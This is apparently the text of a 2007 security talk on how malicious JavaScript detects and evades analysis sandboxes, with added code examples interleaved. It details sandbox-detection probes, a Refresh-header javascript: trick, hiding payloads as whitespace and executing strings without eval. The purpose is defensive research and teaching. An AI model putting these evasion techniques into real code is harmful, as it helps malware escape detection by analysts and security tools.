1
Circumventing Automated JavaScript Analysis
Billy Hoffman (billy.hoffman@hp.com), HP Web Security Research Group
© 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
2
Overview
- JavaScript is part of the attacker's toolkit
  - The "vanilla" attacks are old news; now it is used to pack traditional malware
- IBM ISS: "In second half 2007 Web attack obfuscation approached 100%" (IBM Internet Security Systems X-Force 2008 Mid-Year Trend Statistics)
- Exploit frameworks amplify the problem: rapid adoption of new techniques
- We need tools to analyze this
- How are we doing, and can we win?
3
Obfuscation Design Pattern
- Malicious code is stored in string literals and numeric literals
- A decode function unpacks the literals into new code
- The ratio of literals to total code is huge!
  - Normal code: 2%-7%
  - Obfuscated code: > 30%
4
Obfuscation Example
5
Obfuscation != Malicious
- Legitimate reasons for obfuscating: "protecting" client-side code, reducing download size
- Common packers: JSMin, Dean Edwards' packer, Yahoo's (YUI Compressor)
- Result: it's tough to know what to analyze
6
Original Approaches to JS Analysis
- The Lazy Method: replace dangerous calls with alert(); run in a browser
- The Tom Liston Method: wrap document.write() output in a <textarea> so it is displayed instead of rendered; run in a browser
- The Perl-Fu Method: port the malware's decoder to Perl
- The Monkey Wrench Method: run it in SpiderMonkey
7
Tricks to Defeat Analysis
- Deliberate sandbox breaks
- Integrity checks
  - arguments.callee.toString() gives the source code of the function body, e.g. arguments.callee.toString().replace(/\W/g,"").toUpperCase();
  - Length checks on the body
  - Use the function body as the decryption key, so an instrumented or edited copy decrypts to garbage
8
VBScript Wrapper
- Still in use: older DHTML web apps, plug-in enumeration (IE8), malware
- No open source VBScript parsers
- No public standard grammar
- Not very widespread
- (Diagram: VBScript -> JavaScript)
9
Preventing Sample Collection
- Can't reverse what you don't have!
- Track IPs: geolocation, blacklist security firms
- Serve once per IP
- User-agent sniffing
- document.referrer tricks
10
For those playing at home
Approach | Difficulties
All approaches | Sample-collection prevention
The Lazy Method | Integrity checks; running hostile code in a browser
The Tom Liston Method | Integrity checks; <textarea> escapes; running hostile code in a browser
Perl-Fu | Way too time consuming; translating JavaScript constructs
The Monkey Wrench Approach | Does pretty well
11
Approach Today
- Combination of automatic and manual analysis
- Interpreters and debuggers (aka sandboxes): Rhino, NJS, DecryptJS, SpiderMonkey
- Trap/monitor certain events: DOM calls, eval()s, etc.
12
It's More Complex Than That
- A JS interpreter/debugger is less than half the battle
- JavaScript != DOM: host objects, events/timers, HTTP requests, error handling
- DOM >= HTML: HTTP headers/cookies, browser environment, plug-ins
13
Fundamental Issue
Current JavaScript sandboxes fail to fully or properly emulate the browser environment, and these discrepancies are detectable by the JavaScript running inside the sandbox.
14
Fundamental Issue (illustrated): browser != sandbox
15
Detecting JavaScript Sandboxes
- Four big areas: DOM testing, network testing, execution environment testing, plug-in testing
- Use the test results to decrypt the next layer, or as a handshake to serve the next layer
16
DOM Testing
- Using the DOM values
- Detecting presence/lack of objects
- Gets and sets on values
- Interacting with HTML elements
17
DOM Testing: Basic
- Sandbox-specific functions: gc(), clone(), trap(), untrap(), readline()
- Malware forces SpiderMonkey to die:
  try { quit(); } catch (e) { } // more code here
  In a browser quit() is undefined, so the exception is swallowed and the code continues; in the shell the run simply ends.
18
Detecting Sandbox-Specific Functions
  if (typeof(gc) == "function") { /* sandbox */ } else { /* browser */ }
19
Function Clobbering
- JavaScript is highly dynamic
- Functions can be redefined at runtime!
20
Redefining print() as quit()
21
Redefining quit() To Nothing
22
Intertwined DOM Properties
- Various aliases in the DOM:
  - document.location == window.location == document.URL
  - window == window.window == window.self == window.parent == window.self.self.self.self... (window.parent equals window only when the page is not framed)
  - Any global variable attaches to window: var spi = 5; window.spi == spi; // true
- Set a value on one alias, read it on another; different values mean a sandbox
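The DOM-side probes from the last few slides (shell-only functions, window aliases, location aliases) and the analyst-side counter-move of clobbering quit(), as an added example that is not code from the original talk. The probes take an explicit global object so they can be run here under Node.js against two constructed stand-ins (a browser-like window and a shell-like sandbox, both assumptions for the demo); in a real page you would call classify(window).

```javascript
'use strict';
// Added example, not from the original talk. The three DOM-side probes the
// slides describe, written over an explicit global object so they can be
// exercised here (Node.js) against constructed stand-ins for a browser window
// and for a JavaScript-shell sandbox. In a page you would call classify(window).

// Functions only the SpiderMonkey/Rhino command-line shells define.
const SHELL_ONLY = ['gc', 'clone', 'trap', 'untrap', 'readline', 'quit', 'print'];

// Probe 1: a shell-only function being present means this is not a browser.
function probeShellFunctions(g) {
  return SHELL_ONLY.filter((name) => typeof g[name] === 'function');
}

// Probe 2: window, window.window, window.self, window.parent and window.top
// must all be the same object, and a global set through one alias must be
// readable through every other. (window.parent === window only holds for an
// unframed page; a framed page would have to drop parent/top from the list.)
function probeWindowAliases(w) {
  const token = 'spi_' + Math.random().toString(36).slice(2);
  w[token] = 5;
  const aliases = [w.window, w.self, w.parent, w.top];
  const consistent = aliases.every((a) => a === w && a[token] === 5);
  delete w[token];
  return consistent;
}

// Probe 3: document.location, window.location and document.URL must agree.
function probeLocationAliases(w) {
  const d = w.document;
  if (!d || !w.location || !d.location) return false;
  const here = String(w.location);
  return String(d.location) === here && d.URL === here;
}

function classify(g) {
  const reasons = [];
  const shell = probeShellFunctions(g);
  if (shell.length) reasons.push('shell-only functions: ' + shell.join(', '));
  if (!probeWindowAliases(g)) reasons.push('window aliases disagree');
  if (!probeLocationAliases(g)) reasons.push('location aliases disagree');
  return { verdict: reasons.length ? 'sandbox' : 'browser', reasons };
}

// Function clobbering from the analyst's side: replace the shell's quit() so a
// planted `try { quit(); } catch (e) {}` no longer ends the analysis run.
function clobberQuit(g) {
  if (typeof g.quit === 'function') g.quit = function () {};
  return g;
}

// Constructed stand-ins (assumptions for the demo, not real browser objects).
function makeLocation(href) {
  return { href, toString() { return this.href; } };
}
function makeBrowserLike() {
  const w = {};
  w.window = w; w.self = w; w.parent = w; w.top = w;
  w.location = makeLocation('http://example.test/');
  w.document = { location: w.location, URL: 'http://example.test/' };
  return w;
}
function makeSandboxLike() {
  const w = {};
  w.window = w; w.self = {}; w.parent = {}; w.top = w;  // aliases built as separate objects
  w.location = makeLocation('http://example.test/');
  w.document = { location: makeLocation('about:blank'), URL: 'about:blank' };
  w.gc = function () {}; w.readline = function () { return ''; };
  w.quit = function () { throw new Error('shell quit()'); };
  return w;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('browser-like:', classify(makeBrowserLike()));
  console.log('sandbox-like:', classify(makeSandboxLike()));
}
```

The alias probe writes a random-named global rather than a fixed one so a sandbox that special-cases known probe names still has to get the aliasing right; the location probe compares string forms because a sandbox often builds document.location as a separate, stale object.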
23
document.cookie
- Mosaic Netscape 0.9beta (1994)
- Set using HTTP headers: Set-Cookie: (response), returned by the browser in Cookie: (request)
- Get/set using JavaScript: document.cookie
- Set using HTML: the <meta> tag
25
Meta Tag
- Supplies metadata about an HTML document
- The http-equiv attribute allows the document to specify HTTP headers: content overriding the application protocol
26
HTTP-EQUIV to the Rescue
- Setting cookies with HTML: a <meta http-equiv="Set-Cookie"> tag, followed by alert(document.cookie); to show the cookie was set
27
Setting Cookies with HTML
28
Hello Proprietary Extension!
- Setting cookies with HTML, then alert(document.cookie);
29
Setting Cookies with HTML
30
More Meta Tag Fun
- Hide script in a non-scriptable attribute
- Visible page text: "Safe" / "All safe. Trust me!"
31
HTTP Refresh Header
- Completely remove JS from the response body!
  HTTP/1.1 200 OK
  Refresh: 0;url=javascript:alert('EVIL!')
  Connection: close
  Content-Length: 29

  I'm Clean... really.
- Refresh is not in the HTTP/1.1 RFC, but browsers treat the header like <meta http-equiv="refresh">; whether a javascript: target actually executes is browser-specific
32
Psst! IE8 supports the data: URI scheme; data:text/html and data:text/javascript are awesome!
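A defender-side check for the script-without-<script> vectors covered on the last few slides (a Refresh header, <meta http-equiv="refresh">, <meta http-equiv="Set-Cookie">, and javascript: or data: targets inside them), as an added example that is not code from the original talk. It is regex-based triage rather than an HTML parser, and the sample response it scans is constructed for the demo (the header values echo the slide's example).

```javascript
'use strict';
// Added example, not from the original talk: a triage scanner for the
// script-without-<script> vectors the slides list (a Refresh header, <meta
// http-equiv="refresh">, <meta http-equiv="Set-Cookie">, and javascript:/data:
// targets in any of them). Regex-based, so a first-pass check, not an HTML
// parser. The sample response below is constructed for the demo.

// Split a raw HTTP response into status line, [name, value] headers and body.
function splitHttpResponse(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  const head = sep < 0 ? raw : raw.slice(0, sep);
  const body = sep < 0 ? '' : raw.slice(sep + 4);
  const [statusLine, ...lines] = head.split('\r\n');
  const headers = [];
  for (const line of lines) {
    const m = /^([^:]+):\s*(.*)$/.exec(line);
    if (m) headers.push([m[1].trim().toLowerCase(), m[2]]);
  }
  return { statusLine, headers, body };
}

// Schemes that execute code when a refresh navigates to them.
const SCRIPT_SCHEME = /^\s*(javascript|data)\s*:/i;

// Pull the target out of "<seconds>;url=<target>" (quoting and spacing vary).
function refreshTarget(value) {
  const m = /;\s*url\s*=\s*(.*)$/i.exec(value);
  if (!m) return null;
  return m[1].trim().replace(/^['"]|['"]$/g, '');
}

// Attributes of one tag's attribute string: lower-cased names, unquoted values.
function parseAttributes(s) {
  const out = {};
  const re = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    out[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4];
  }
  return out;
}

// Return one finding per interesting header or meta tag.
function scanResponse(raw) {
  const { headers, body } = splitHttpResponse(raw);
  const findings = [];
  for (const [name, value] of headers) {
    if (name === 'refresh') {
      const target = refreshTarget(value);
      findings.push({ where: 'header', what: 'Refresh', target,
                      script: target !== null && SCRIPT_SCHEME.test(target) });
    }
  }
  const tagRe = /<meta\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(body)) !== null) {
    const attrs = parseAttributes(m[1]);
    const equiv = (attrs['http-equiv'] || '').toLowerCase();
    if (equiv === 'refresh') {
      const target = refreshTarget(attrs.content || '');
      findings.push({ where: 'meta', what: 'refresh', target,
                      script: target !== null && SCRIPT_SCHEME.test(target) });
    } else if (equiv === 'set-cookie') {
      findings.push({ where: 'meta', what: 'Set-Cookie', target: attrs.content || '', script: false });
    }
  }
  return findings;
}

// Constructed sample: no <script> tag anywhere, yet three things worth a look.
const SAMPLE_RESPONSE = [
  'HTTP/1.1 200 OK',
  "Refresh: 0;url=javascript:alert('EVIL!')",
  'Connection: close',
  'Content-Type: text/html',
  '',
  '<html><head>',
  '<meta http-equiv="Set-Cookie" content="k=0x41">',
  "<meta http-equiv='refresh' content='0;url=data:text/html,%3Cscript%3Ealert(1)%3C/script%3E'>",
  "</head><body>I'm Clean... really.</body></html>",
].join('\r\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanResponse(SAMPLE_RESPONSE)) console.log(f);
}
```

A Set-Cookie meta is flagged even though it carries no script, because the slides use exactly that channel to plant a value that a later layer reads back through document.cookie; a sandbox that only executes <script> contents never sees it.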
33
Network Testing
- Sandboxes use dummy network objects: a good "are you a browser?" test
- Use information about the response: DNS successful? Last-Modified? Image dimensions? Valid response?
- Forces the sandbox to send network traffic: web bugs for hackers
34
Network Testing – DNS Lookups
  var count = 0;
  function loaded(name) { if (name != "bad") count++; }
  window.onload = function evil() {
    if (count == 1) alert("Browser!"); else alert("Sandbox!");
  };
The page loads images from hosts whose names do and do not resolve; each image's onload handler calls loaded() with its label, so only a client that really performed the DNS lookups ends up with count == 1.
35
Network Testing – DNS Lookups
36
Network Testing - Images
- The Image object provides rich metadata: height, width, whether the image was valid
- CSS images too
- Use this information for complex handshaking, or to construct a key
  var img = new Image();
  img.onload = goodFunc;
  img.onerror = badFunc;
  img.src = "http://evil.com/";
37
Side Note: Image Side Channels
- The JavaScript Image object's height + width = 8 bytes (two 32-bit values)
- How to send 0xFFFFFFFF without 4 GB of pixel data?
  - GIF, PNG, Windows bitmaps: too short
  - BMP + RLE? Nope
- XBM image format: the dimensions are plain #define values and the bit array can be left empty
  #define w 1351
  #define h 1689
  static char b[]={0};
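The XBM trick as working code, added here and not taken from the original talk: an emitter that packs 8 bytes into the width/height #defines of an otherwise empty XBM, and the consumer that reads them back. In a browser the consumer side is just img.width and img.height inside onload; here the #defines are parsed from the text so the round trip runs offline under Node.js. The function names and the sample payload are assumptions for the demo.

```javascript
'use strict';
// Added example, not from the original talk: the XBM side channel as a pair of
// functions, the emitter that packs 8 bytes into the width/height #defines of
// an otherwise empty XBM, and the consumer that reads them back. In a browser
// the consumer side is img.width / img.height in onload; here the #defines are
// parsed from the text so the round trip runs offline. Names and sample bytes
// are assumptions for the demo.

// Big-endian unsigned 32-bit value from four bytes starting at offset o.
function u32At(bytes, o) {
  return ((bytes[o] << 24) | (bytes[o + 1] << 16) | (bytes[o + 2] << 8) | bytes[o + 3]) >>> 0;
}

// Emit an XBM whose dimensions carry the payload. The bits array holds no
// real pixel data, which is why a 2^32 x 2^32 "image" is a few dozen bytes.
function xbmFromBytes(bytes, name = 'b') {
  if (bytes.length !== 8) throw new RangeError('payload must be exactly 8 bytes');
  const width = u32At(bytes, 0);
  const height = u32At(bytes, 4);
  return `#define ${name}_width ${width}\n` +
         `#define ${name}_height ${height}\n` +
         `static char ${name}_bits[] = {0};\n`;
}

// Read the first two numeric #defines as width and height. Both the slide's
// short form (#define w ... / #define h ...) and the conventional
// _width/_height names parse, mirroring how loosely the browser decoder read them.
function parseXbmDimensions(text) {
  const re = /#define\s+\S+\s+(\d+)/g;
  const values = [];
  let m;
  while (values.length < 2 && (m = re.exec(text)) !== null) values.push(Number(m[1]));
  if (values.length < 2) throw new Error('not an XBM header');
  return { width: values[0], height: values[1] };
}

// Unpack the two dimensions back into the 8 payload bytes.
function bytesFromDimensions({ width, height }) {
  const out = [];
  for (const v of [width, height]) {
    out.push((v >>> 24) & 0xff, (v >>> 16) & 0xff, (v >>> 8) & 0xff, v & 0xff);
  }
  return out;
}

// Round trip through the text form; true when every byte survives.
function roundTrip(bytes) {
  const recovered = bytesFromDimensions(parseXbmDimensions(xbmFromBytes(bytes)));
  return recovered.length === bytes.length && recovered.every((b, i) => b === bytes[i]);
}

// Constructed payload: 0xFFFFFFFF (the slide's example) plus a second word.
const PAYLOAD = [0xff, 0xff, 0xff, 0xff, 0xde, 0xad, 0xbe, 0xef];

if (typeof require !== 'undefined' && require.main === module) {
  const xbm = xbmFromBytes(PAYLOAD);
  console.log(xbm);
  console.log(xbm.length, 'bytes on the wire, dimensions', parseXbmDimensions(xbm));
}
```

Caveat for anyone building or detecting this channel: a decoder may refuse absurd dimensions or fail to allocate the bitmap, so a practical channel keeps each value in a range the browser accepts (the slide's 1351 x 1689 is a few hundred kilobytes of bitmap) and spreads the key over several images; the full 64 bits per image is the theoretical ceiling, not what reliably arrives.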
38
FF XBM... WTF?!
39
The Dan Kaminsky Option
40
Network Testing - Ajax
- Ajax can see HTTP response headers: complex handshaking, construct a key
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function () {
    if (xhr.readyState == 4 && xhr.status == 200) {
      if (xhr.getResponseHeader("Secr3t") == "key") {
        // do evil
      }
    }
  };
- XMLHttpRequest is same-origin, so the secret header has to come from the server that served the script
41
Execution Environment Testing
- Sandboxes execute code differently: they trap function calls, step/break on code, manipulate data
- These differences are detectable through timing information, event order and error handling
42
Timing Information
- Use JavaScript's Date object: millisecond-resolution times
- Can detect paused execution
  var start = (new Date()).getTime();
  document.writeln(String.fromCharCode(66, 77, 72));
  var diff = (new Date()).getTime() - start;
  if (diff < 3) document.writeln("Browser"); else document.writeln("Sandbox");
43
Detecting Steps/Breaks with Timers
- Timers are a pain for sandboxes: they can't really wait 5 seconds; ordering; clearing
- Can detect paused execution: start a timer that performs some operation (count++ ...), then after a fixed interval sample the value
44
Detecting Steps/Breaks with Timers
  var count = 0;
  setInterval("count++;", 10);   // about 100 ticks per second
  setTimeout(checkSum, 1000);
  function checkSum() {
    // allow for skew: a 10 ms interval yields roughly 100 ticks in 1000 ms,
    // fewer if the interpreter paused (browsers also clamp very short intervals)
    if (count >= 90 && count <= 100) { alert("Browser"); } else { alert("Sandbox"); }
  }
45
Event Order
- Sandboxes don't run events in the proper order
- XMLHttpRequest's onreadystatechange fires 4 times (readyState 1 through 4)
- onclick >> onclick >> ondblclick
- onkeydown >> onkeypress >> onkeyup
- onmousedown >> onmouseup >> onclick
- onmouseover >> onmousemove
- onfocus >> onclick (for inputs: focus moves on mousedown, before the click fires)
- onfocus >> onblur
- onload >> onunload
46
Advanced Event Order
- Dependents' onload (iframes, images) fires before window.onload
- Event propagation: DOM events must bubble; whether the default action continues depends on the handler's return value
- Events that never fire: elements made invisible with CSS
- (Diagram: an onclick bubbling INPUT -> DIV -> BODY -> WINDOW)
47
Error Handling
- window.onerror handles uncaught exceptions
- Induce syntax errors; recover in the handler
  window.onerror = function() { /* evil code */ }
  Lolz &nd B00m$; // Syntax Error
- The handler has to be installed in an earlier <script> block: a syntax error stops the whole block it is in from running, including an onerror assignment placed above it
48
Error Handling
- Induce runtime errors instead: harder to handle/debug
  window.onerror = function() { /* evil code */ }
  function boom() { return 'so long!' & boom(); }
  boom(); // error: too much recursion
49
Advanced Error Handling
- Detailed info is passed to window.onerror: message, file, line number
- Can be used to fingerprint the web browser, verify the domain/location, or construct a decryption key
50
Plug-in Testing
- Not just navigator.plugins checks
- Timing is a cool test: did I really invoke that ActiveX object?
- Sizing is a cool test: is that applet really 400 x 300?
- Cross communication, really sexy: apply the previous methods (error handling, eventing, etc.) inside the plug-in
51
JavaScript -> Flash -> JavaScript
- Multiple ways: getURL(); Flash LSO
- Additional capabilities: richer HTTP requests, more file formats
- Excellent browser support
- (Diagram: Flash <-> JavaScript)
52
JavaScript -> Java -> JavaScript
- Lots of fun object casting: JSObject -> double -> JSObject
- Java has more capabilities than JS: high-resolution timers, sockets, internal IP
- Assault the researcher: signed applets can access the file system!
- LiveConnect: var myAddress = java.net.InetAddress.getLocalHost();
- (Diagram: Java <-> JavaScript)
53
Preventing Sample Gathering
- Browser Identification for Web Applications (Shreeraj Shah, 2004)
- HTTP headers: ordering and values; redirects, form posts, content types, cookie settings
- HTTP caching: obeying the directives; HTTP/1.1 vs HTTP/1.0 precedence; sending conditional GETs
54
Crazy Idea #1
- Obfuscated code is obviously interesting, but not always malicious
- "Safe"-looking code might not be interesting
- Can I create code that doesn't look malicious?
55
Dehydrating a String
- Converts any string into whitespace, 7 bits per character: 1 = space, 0 = tab; \n means we are done
- 'a' = 0x61 = 1100001, so dehydrate('a') = space, space, tab, tab, tab, tab, space
56
Dehydrate Function
  function dehydrate(s) {
    var r = new Array();
    for (var i = 0; i < s.length; i++) {
      for (var j = 6; j >= 0; j--) {
        // bit set -> space, bit clear -> tab (7 bits per character, MSB first)
        if (s.charCodeAt(i) & Math.pow(2, j)) { r.push(' '); } else { r.push('\t'); }
      }
    }
    r.push('\n');   // terminator
    return r.join('');
  }
57
Hydrate Function
  function hydrate(s) {
    var r = new Array();
    var curr = 0;
    while (s.charAt(curr) != '\n') {     // stop at the terminator
      var tmp = 0;
      for (var i = 6; i >= 0; i--) {     // read 7 whitespace characters per byte
        if (s.charAt(curr) == ' ') { tmp = tmp | Math.pow(2, i); }
        curr++;
      }
      r.push(String.fromCharCode(tmp));
    }
    return r.join('');
  }
58
Invisible Malicious Code!
- The dehydrated payload sits between two marker comments in the page (//st4rt ... //3nd); the visible script extracts and rehydrates it:
  var html = document.body.innerHTML;
  var start = html.indexOf("//st" + "4rt");
  var end = html.indexOf("3" + "nd");
  var code = html.substring(start + 12, end);   // offset skips the marker and the markup that follows it in the page
  eval(hydrate(code));
- The markers are assembled at runtime ("//st" + "4rt") so the extraction code, which is itself part of innerHTML, does not contain the string it searches for
59
Crazy Idea #2
- Who cares how it's encoded? Eventually they have to execute the string of code
- CaffeineMonkey et al. are just hooking eval()
- Can I execute malicious code stored in a string without eval()?
60
Eval(): The Interpreter Has a Posse...
  var evilCode = "alert('evil');";
  window.location.replace("javascript:" + evilCode);
  document.location.replace("javascript:" + evilCode);
  setTimeout(evilCode, 10);
  setInterval(evilCode, 500);
  new Function(evilCode)();
  window.execScript(evilCode); // IE only
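Why "just hook eval()" is not enough, shown on the sinks that exist in Node.js; this is an added example and not code from the original talk or from any of the sandboxes it names. The global eval binding and the Function constructor are wrapped, the latter both at the global name and at Function.prototype.constructor (which is what `(function(){}).constructor` resolves to), and four payload variants are run under an eval-only hook and then under the full hooks. The browser-only sinks from the slide (setTimeout/setInterval with a string, javascript: URLs through location.replace(), IE's execScript()) would need the same treatment in a browser sandbox.

```javascript
'use strict';
// Added example, not from the original talk: why "just hook eval()" is not
// enough for a sandbox, shown on the sinks that exist in Node.js. The global
// eval binding and the Function constructor are wrapped (the latter both at
// the global name and at Function.prototype.constructor, which is what
// `(function(){}).constructor` resolves to). setTimeout/setInterval with a
// string, javascript: URLs via location.replace() and IE's execScript() are
// browser-only and would need the same treatment there.

// Everything the hooks observe: [sink name, code string].
const seen = [];

function hookEval() {
  const originalEval = globalThis.eval;
  globalThis.eval = function hookedEval(code) {
    seen.push(['eval', String(code)]);
    return originalEval(code);           // indirect eval, global scope
  };
  return () => { globalThis.eval = originalEval; };
}

function hookFunctionConstructor() {
  const OriginalFunction = globalThis.Function;
  function hookedFunction(...args) {
    seen.push(['Function', String(args[args.length - 1] || '')]);  // body is the last arg
    return OriginalFunction(...args);
  }
  hookedFunction.prototype = OriginalFunction.prototype;
  globalThis.Function = hookedFunction;
  OriginalFunction.prototype.constructor = hookedFunction;
  return () => {
    globalThis.Function = OriginalFunction;
    OriginalFunction.prototype.constructor = OriginalFunction;
  };
}

// The variants an obfuscator reaches for once eval() is known to be watched.
function runPayloadVariants() {
  const code = '6 * 7';
  return [
    eval(code),                                          // the classic sink
    new Function('return ' + code)(),                    // no eval() in sight
    (function () {}).constructor('return ' + code)(),    // never names Function
    globalThis['ev' + 'al'](code),                       // name assembled at runtime
  ];
}

// Run the variants under an eval-only hook and then under the full hooks,
// reporting which sink names were observed for each configuration.
function auditSinkCoverage() {
  const report = {};

  const restoreEvalOnly = hookEval();
  seen.length = 0;
  report.evalOnly = { results: runPayloadVariants(), sinks: seen.map((e) => e[0]) };
  restoreEvalOnly();

  const restoreEval = hookEval();
  const restoreFunction = hookFunctionConstructor();
  seen.length = 0;
  report.full = { results: runPayloadVariants(), sinks: seen.map((e) => e[0]) };
  restoreFunction();
  restoreEval();

  return report;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditSinkCoverage(), null, 2));
}
```

All four variants compute the same value in both configurations; the difference is that the eval-only hook logs two of them and the full hooks log all four. The runtime-assembled name still hits the hook because it resolves to the same global property, which is the general lesson: instrument the sink object, not the spelling of its name.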
61
Fixing All of This
- Advice for tool developers
  - Remove discrepancies between sandbox and browser: DOM/HTTP/DNS/network/eventing
  - Everything should be interesting
  - The sandbox needs a sandbox; you will be attacked
- Advice for others
  - Microsoft: publish a grammar for VBScript; disable it completely based on DOCTYPE
  - Adobe: release a controllable Flash VM
62
Shoulders of Giants
- Jose Nazario
- Ben Feinstein
- Internet Storm Center guys
- Stephan Chenette, et al. @ WebSense
- Shreeraj Shah
- Rob Freeman
- Aviv Raff
63
Questions? Billy.hoffman@hp.com